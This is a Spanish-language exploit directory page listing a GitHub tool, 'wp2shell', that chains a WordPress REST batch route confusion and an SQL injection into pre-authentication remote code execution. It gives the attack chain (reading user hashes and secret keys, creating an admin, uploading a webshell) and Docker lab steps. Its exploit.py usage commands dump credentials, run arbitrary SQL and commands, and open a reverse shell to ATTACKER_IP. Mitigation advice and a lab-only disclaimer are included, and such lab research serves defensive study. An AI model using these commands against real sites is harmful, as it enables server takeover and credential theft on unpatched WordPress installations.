Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-63030-CVE-2026-60137 | Kitploit
Herramientas/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-63030-CVE-2026-60137

Ver Repositorio
hace 27 díasAún no revisado

CVE-2026-63030 & CVE-2026-60137 — wp2shell

WordPress Core RCE Pre-Auth — Confusión de rutas + inyección SQL encadenadas para ejecución remota de código

CVECVE-2026-63030 + CVE-2026-60137
Aliaswp2shell
Tipo de vulnerabilidadConfusión de rutas en REST API → Inyección SQL → RCE
GravedadCrítica — CVSS 10.0
Afecta aWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Corregido enWordPress 6.8.6, 6.9.5, 7.0.2
Autenticación requeridaNinguna (Pre-Auth)

Resumen

wp2shell es el nombre de la cadena de explotación que combina 2 vulnerabilidades en el núcleo de WordPress:

  • CVE-2026-63030 — Route Confusion: el endpoint batch (/wp-json/batch/v1) tiene un desajuste de índices entre los arrays $matches[] y $validation[] cuando un sub-request tiene una ruta no válida, lo que hace que el siguiente sub-request se ejecute con un handler incorrecto → se omite la validación de esquema de la REST API.
  • CVE-2026-60137 — SQL Injection: WP_Query::get_posts() no sanitiza el parámetro author__not_in cuando recibe un string en lugar de un array → inyección SQL en bruto.

Ambos bugs combinados forman una cadena Pre-Auth RCE completa — desde 0 credenciales hasta una shell en el servidor, únicamente mediante peticiones HTTP.

Cadena de explotación

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

Lee el análisis técnico completo en REPORT.md


Configuración del laboratorio

El laboratorio utiliza Docker Compose con 3 contenedores:

Requisitos

  • Docker + Docker Compose
  • Python 3.8+ (solo stdlib, sin necesidad de instalar paquetes adicionales)
  • Bash (para ejecutar setup.sh)

Inicio

root@kitploit:~
cd wp2shell-lab
bash setup.sh

El script automáticamente:

  1. Descarga las imágenes e inicia los contenedores
  2. Instala WordPress 6.9.4
  3. Introduce datos de ejemplo (posts, usuarios)
  4. Activa el general log de MySQL y WP_DEBUG

Al finalizar, mostrará "WP2Shell Lab — READY!" junto con las credenciales de acceso.

Limpieza

root@kitploit:~
cd wp2shell-lab
docker compose down -v

Uso del exploit

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

El script PoC fue reescrito desde cero, tomando como referencia Icex0/wp2shell-poc. Usa únicamente la stdlib de Python 3, sin necesidad de instalar dependencias adicionales.


Condiciones de explotación

CondiciónRequisito
Versión de WordPress6.9.0–6.9.4 o 7.0.0–7.0.1
Endpoint batch de la REST APIAccesible (activado por defecto)
AutenticaciónNo necesaria
RedEl atacante puede alcanzar WordPress

Mitigación

  1. Actualizar WordPress a >= 6.9.5 o >= 7.0.2 — la única solución definitiva.
  2. Desactivar temporalmente el endpoint batch: añade add_filter('rest_batch_disabled', '__return_true'); en functions.php.
  3. Regla WAF: bloquea las peticiones a /wp-json/batch/v1 que contengan palabras clave SQL.

Aviso legal

Este repositorio se creó con fines de investigación, aprendizaje y CTF en un entorno de laboratorio controlado. No lo utilices para atacar sistemas reales. Cualquier explotación no autorizada es una violación de la ley.


Referencias

  • Icex0/wp2shell-poc — PoC original de referencia
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
Descargar herramienta
Contenedor
Imagen
Puerto
WordPress (vulnerable)wordpress:6.9.48080
MySQLmysql:8.0interno
phpMyAdminphpmyadmin:latest8081